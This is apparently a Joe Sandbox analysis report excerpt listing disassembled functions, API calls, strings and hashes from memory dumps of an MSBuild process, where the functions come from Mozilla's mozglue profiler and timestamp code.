                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C894A68), ref: 6C8C945E
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C8C9470
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C8C9482
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: __Init_thread_footer.LIBCMT ref: 6C8C949F
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CDE73
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CDF7D
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CDF8A
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CDFC9
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CDFF7
                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C8CE000
                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C894A68), ref: 6C8CDE7B
                                                                                                                                                                                                                        • Part of subcall function 6C8C94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C8C94EE
                                                                                                                                                                                                                        • Part of subcall function 6C8C94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C8C9508
                                                                                                                                                                                                                        • Part of subcall function 6C8BCBE8: GetCurrentProcess.KERNEL32(?,6C8831A7), ref: 6C8BCBF1
                                                                                                                                                                                                                        • Part of subcall function 6C8BCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C8831A7), ref: 6C8BCBFA
                                                                                                                                                                                                                      • ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C894A68), ref: 6C8CDEB8
                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,6C894A68), ref: 6C8CDEFE
                                                                                                                                                                                                                      • ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C8CDF38
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • <none>, xrefs: 6C8CDFD7
                                                                                                                                                                                                                      • [I %d/%d] locked_profiler_stop, xrefs: 6C8CDE83
                                                                                                                                                                                                                      • [I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6C8CE00E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CurrentThread$getenv$ExclusiveLockProcessRelease_getpid$AcquireBufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterTerminate__acrt_iob_func__stdio_common_vfprintffree
                                                                                                                                                                                                                      • String ID: <none>$[I %d/%d] locked_profiler_stop$[I %d/%d] profiler_set_process_name("%s", "%s")
                                                                                                                                                                                                                      • API String ID: 1281939033-809102171
                                                                                                                                                                                                                      • Opcode ID: 71215998e1b23f13dfbf178f645cff7064d303aaf5da9b64820443765ba4e8e3
                                                                                                                                                                                                                      • Instruction ID: 16d41a54cc87097126bb870f88209a8d61d5578face551152c9dc678b2d9600a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 71215998e1b23f13dfbf178f645cff7064d303aaf5da9b64820443765ba4e8e3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9C41F3317056109BDB20AF68CA487AAB775FB8630CF24082EED1997F01CB71D905CBE6
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8DD85F
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C8DD86C
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C8DD918
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8DD93C
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C8DD948
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C8DD970
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8DD976
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C8DD982
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C8DD9CF
                                                                                                                                                                                                                      • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C8DDA2E
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8DDA6F
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C8DDA78
                                                                                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE ref: 6C8DDA91
                                                                                                                                                                                                                        • Part of subcall function 6C8A5C50: GetTickCount64.KERNEL32 ref: 6C8A5D40
                                                                                                                                                                                                                        • Part of subcall function 6C8A5C50: EnterCriticalSection.KERNEL32(6C90F688), ref: 6C8A5D67
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C8DDAB7
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Count64CriticalEnterSectionStampTickTimeV01@@Value@mozilla@@Xbad_function_call@std@@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1195625958-0
                                                                                                                                                                                                                      • Opcode ID: 77a54ad70abf2d84dcc3d46b1e432220d038f3541cfb3c4efd0fd1c1c7f5b7cb
                                                                                                                                                                                                                      • Instruction ID: e34b939c8a02667a1de549d06cf1627bcfb471939a135c748c209792b3ef9b64
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 77a54ad70abf2d84dcc3d46b1e432220d038f3541cfb3c4efd0fd1c1c7f5b7cb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 81718D75604304DFCB10CF29C884A9ABBF5FF89354F25896EE85A9B301DB31A944CBA1
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8DD4F0
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C8DD4FC
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C8DD52A
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8DD530
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C8DD53F
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C8DD55F
                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C8DD585
                                                                                                                                                                                                                      • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C8DD5D3
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8DD5F9
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C8DD605
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C8DD652
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8DD658
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C8DD667
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C8DD6A2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2206442479-0
                                                                                                                                                                                                                      • Opcode ID: ac08256de25291b3e0a510eaf174e345cf01c379b87643d1094a008fdd181e3d
                                                                                                                                                                                                                      • Instruction ID: 7711c6a84ab6deff3b512591b8dc9d60a1399b4c91881cd487505bdca2a74853
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ac08256de25291b3e0a510eaf174e345cf01c379b87643d1094a008fdd181e3d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F4517BB1608705EFC714DF24C884A9ABBF4FF89318F108A2EE95A87710DB30B945CB91
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6C8A56D1
                                                                                                                                                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C8A56E9
                                                                                                                                                                                                                      • ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6C8A56F1
                                                                                                                                                                                                                      • ?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6C8A5744
                                                                                                                                                                                                                      • ??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6C8A57BC
                                                                                                                                                                                                                      • GetTickCount64.KERNEL32 ref: 6C8A58CB
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90F688), ref: 6C8A58F3
                                                                                                                                                                                                                      • __aulldiv.LIBCMT ref: 6C8A5945
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90F688), ref: 6C8A59B2
                                                                                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6C90F638,?,?,?,?), ref: 6C8A59E9
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
                                                                                                                                                                                                                      • String ID: MOZ_APP_RESTART
                                                                                                                                                                                                                      • API String ID: 2752551254-2657566371
                                                                                                                                                                                                                      • Opcode ID: b9e0d65302947a66df8c443e6bde952bf151b1d416446227f92290126815f9cf
                                                                                                                                                                                                                      • Instruction ID: 3f94658266789ff416624943568912e334d3328f40e355d9194d95c49d7162c1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b9e0d65302947a66df8c443e6bde952bf151b1d416446227f92290126815f9cf
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7C1BE31A0C7449FCB15CF68C54066AB7F1FFCA718F158A2DE8C497620D730A986CB86
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C894A68), ref: 6C8C945E
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C8C9470
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C8C9482
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: __Init_thread_footer.LIBCMT ref: 6C8C949F
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CEC84
                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C8CEC8C
                                                                                                                                                                                                                        • Part of subcall function 6C8C94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C8C94EE
                                                                                                                                                                                                                        • Part of subcall function 6C8C94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C8C9508
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CECA1
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CECAE
                                                                                                                                                                                                                      • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C8CECC5
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CED0A
                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C8CED19
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 6C8CED28
                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C8CED2F
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CED59
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • [I %d/%d] profiler_ensure_started, xrefs: 6C8CEC94
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                                                                                                                                                                      • String ID: [I %d/%d] profiler_ensure_started
                                                                                                                                                                                                                      • API String ID: 4057186437-125001283
                                                                                                                                                                                                                      • Opcode ID: 858d58e2411142a716433d306473a2a0bd2ed8cc01c09aab164b8ca03fd50388
                                                                                                                                                                                                                      • Instruction ID: 89424b2c68e86a89b4ff060f063052b3325af1018362a23910afcc6f12017f4e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 858d58e2411142a716433d306473a2a0bd2ed8cc01c09aab164b8ca03fd50388
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 422135B1704108EBDB109F68D909A9A3779EF4632DF20462CFE1887B40DB34D805CBE6
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • AcquireSRWLockShared.KERNEL32 ref: 6C893BB4
                                                                                                                                                                                                                      • ReleaseSRWLockShared.KERNEL32 ref: 6C893BD2
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32 ref: 6C893BE5
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32 ref: 6C893C91
                                                                                                                                                                                                                      • ReleaseSRWLockShared.KERNEL32 ref: 6C893CBD
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE ref: 6C893CF1
                                                                                                                                                                                                                        • Part of subcall function 6C89CA10: malloc.MOZGLUE(?), ref: 6C89CA26
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Lock$ReleaseShared$AcquireExclusive$mallocmoz_xmalloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1881024734-0
                                                                                                                                                                                                                      • Opcode ID: a0dc1bae3c25fd316a35793d8a6611ac8c2716c2bf52c4cce546e60fe22efed0
                                                                                                                                                                                                                      • Instruction ID: 71a378026fd17d1f54045540658eb2622f05156b3b1d29fc3ecfa2a242acc43d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0dc1bae3c25fd316a35793d8a6611ac8c2716c2bf52c4cce546e60fe22efed0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4DC140B5A09B05CFC724DF28C18465AFBF1BF89308F158A6ED8994BB11D731E885CB81
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C88EB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C88EB83
                                                                                                                                                                                                                      • ?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?,?,?,?,?,?,6C8CB392,?,?,00000001), ref: 6C8C91F4
                                                                                                                                                                                                                        • Part of subcall function 6C8BCBE8: GetCurrentProcess.KERNEL32(?,6C8831A7), ref: 6C8BCBF1
                                                                                                                                                                                                                        • Part of subcall function 6C8BCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C8831A7), ref: 6C8BCBFA
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
                                                                                                                                                                                                                      • String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
                                                                                                                                                                                                                      • API String ID: 3790164461-3347204862
                                                                                                                                                                                                                      • Opcode ID: 4e88d80d39be69e951eb577f695a8f9d53d2c484d4b864f21c4a09aa4d3cee47
                                                                                                                                                                                                                      • Instruction ID: 47849f8cae49e54a4bfb71c4b640d761b33e16125e0f9c8a7537f310aea7c2c7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4e88d80d39be69e951eb577f695a8f9d53d2c484d4b864f21c4a09aa4d3cee47
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7EB1D3B1B012099BDB24CF98C691BAEBBB5BF85308F10482DD511ABF80D731E949CBD1
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C8AC5A3
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32 ref: 6C8AC9EA
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C8AC9FB
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C8ACA12
                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C8ACA2E
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C8ACAA5
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiWidestrlen$freemalloc
                                                                                                                                                                                                                      • String ID: (null)$0
                                                                                                                                                                                                                      • API String ID: 4074790623-38302674
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • islower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C8AC784
                                                                                                                                                                                                                      • _dsign.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C8AC801
                                                                                                                                                                                                                      • _dtest.API-MS-WIN-CRT-MATH-L1-1-0(?), ref: 6C8AC83D
                                                                                                                                                                                                                      • ?ToPrecision@DoubleToStringConverter@double_conversion@@QBE_NNHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C8AC891
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: String$Builder@2@@Converter@double_conversion@@DoublePrecision@_dsign_dtestislower
                                                                                                                                                                                                                      • String ID: INF$NAN$inf$nan
                                                                                                                                                                                                                      • API String ID: 1991403756-4166689840
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C883284,?,?,6C8A56F6), ref: 6C883492
                                                                                                                                                                                                                      • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C883284,?,?,6C8A56F6), ref: 6C8834A9
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C883284,?,?,6C8A56F6), ref: 6C8834EF
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C88350E
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C883522
                                                                                                                                                                                                                      • __aulldiv.LIBCMT ref: 6C883552
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C883284,?,?,6C8A56F6), ref: 6C88357C
                                                                                                                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C883284,?,?,6C8A56F6), ref: 6C883592
                                                                                                                                                                                                                        • Part of subcall function 6C8BAB89: EnterCriticalSection.KERNEL32(6C90E370,?,?,?,6C8834DE,6C90F6CC,?,?,?,?,?,?,?,6C883284), ref: 6C8BAB94
                                                                                                                                                                                                                        • Part of subcall function 6C8BAB89: LeaveCriticalSection.KERNEL32(6C90E370,?,6C8834DE,6C90F6CC,?,?,?,?,?,?,?,6C883284,?,?,6C8A56F6), ref: 6C8BABD1
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
                                                                                                                                                                                                                      • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                                                                                                                                                                                                      • API String ID: 3634367004-706389432
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
